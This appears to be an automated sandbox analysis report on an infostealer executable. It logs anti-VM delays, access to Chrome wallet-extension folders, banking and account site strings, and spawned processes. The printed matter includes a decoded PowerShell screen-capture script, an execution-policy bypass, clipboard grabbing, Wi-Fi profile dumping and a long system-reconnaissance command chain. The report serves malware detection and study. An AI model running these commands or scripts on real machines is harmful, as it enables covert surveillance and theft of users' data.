                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_decimal.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeAPI coverage: 0.6 %
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeAPI coverage: 0.3 %
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe TID: 8188Thread sleep count: 545 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe TID: 8188Thread sleep time: -545000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe TID: 8188Thread sleep count: 9422 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe TID: 8188Thread sleep time: -9422000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep count: 3412 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep count: 662 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5068Thread sleep count: 4388 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5068Thread sleep count: 4081 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E50B970 _Py_NoneStruct,_PyArg_ParseTuple_SizeT,GetSystemInfo,VirtualAlloc,_Py_Dealloc,PyExc_MemoryError,PyErr_SetString,_PyObject_GC_New,PyExc_NotImplementedError,PyErr_Format,Py_FatalError,PyObject_GC_Track,PyExc_SystemError,PyErr_SetString,_Py_Dealloc,_Py_Dealloc,48_2_00007FF81E50B970
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1718105978.0000022334F18000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                      Source: net1.exe, 0000001E.00000002.1456890690.000002E2E3DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1718105978.0000022334F18000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicvss
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicheartbeat
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
                      Source: HOSTNAME.EXE, 00000016.00000002.1432860069.00000220B0939000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                      Source: net1.exe, 0000001E.00000002.1456890690.000002E2E3DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V AdministratorsvL)
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicshutdown
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC71AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF81DC71AC0
                      Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81DC714F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_00007FF81DC714F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E4E3FA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_00007FF81E4E3FA0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E4E4570 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF81E4E4570
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E51B738 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF81E51B738
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81DF4EC00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81DF4EC00
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC51AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00007FF81EC51AC0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC514F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81EC514F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC61A00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00007FF81EC61A00
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC61430 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81EC61430
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC71460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81EC71460
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC71A30 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00007FF81EC71A30
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC835D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00007FF81EC835D0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81EC83000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81EC83000
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeCode function: 58_2_00007FF81ECB6390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00007FF81ECB6390

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe "C:\Users\user\Desktop\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
